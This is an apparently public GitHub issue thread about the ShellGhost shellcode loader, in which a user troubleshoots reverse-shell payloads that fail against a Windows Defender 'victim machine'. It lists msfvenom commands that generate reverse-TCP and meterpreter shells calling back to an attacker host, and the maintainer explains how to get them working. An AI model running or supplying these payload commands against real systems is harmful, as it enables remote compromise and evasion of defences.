Unable to get shell code execution.

[brucebatman]

Hello lem0nSec, thank you for taking the time of making this tool

The current calc shellcode works, this one is provided by your examples, i have tried the following with no dice.

Payloads Tested:

• msfvenom -p windows/shell_reverse_tcp LHOST=192.168.122.22 LPORT=4444 EXITFUNC=thread -e generic/none -f python
• msfvenom -p windows/shell_reverse_tcp LHOST=192.168.122.22 LPORT=4444 EXITFUNC=process -e generic/none -f python
• msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.122.22 LPORT=4444 EXITFUNC=process -e generic/none -f python
• Cobalt Strike stageless payload

Procedure:

• Gather the shellcode, place it in your ShellGhost_mapping.py then execute with ShellGhost_mapping.py -1
• Place the shellcode inside the VS solution
• Compile & Execute
• Expected Results: Reverse shell
• Current Results : 100% CPU usage on both binaries, no callback or reverse shell.

Environment:

• Windows 10 Victim Machine - Windows Defender
• Windows 10 Development Machine - Wo Defender.
• Hacking Machine (Kali Virtual Machine) Updated.

Again thanks for your help.

[lem0nSec]

Hi, thanks for opening an issue. Make sure you use a non-staged x64 reverse shell shellcode as payload. Also the script should be executed with the -4 parameter as well. Otherwise you won't be able to modify the header file accordingly.

[brucebatman]

@lem0nSec

Hello, i have tried the proposed solution, and unfortunately, i haven't got any connect back, so i decided to use your example, and change the executed command.

I just want to validate my steps, 1) msfvenom -p windows/x64/exec cmd=notepad.exe EXITFUNC=thread -e generic/none -f python 2) copy the output of the msfvenom command inside the ShellGhost_mapping.py 3) ShellGhost_mapping.py -1 or -4i have tried both. 4) Compile the Solution from VS 5) Execute the program

Result : Nothing, the ShellGhost binary still runs, but nothing happens. Again thanks for your help.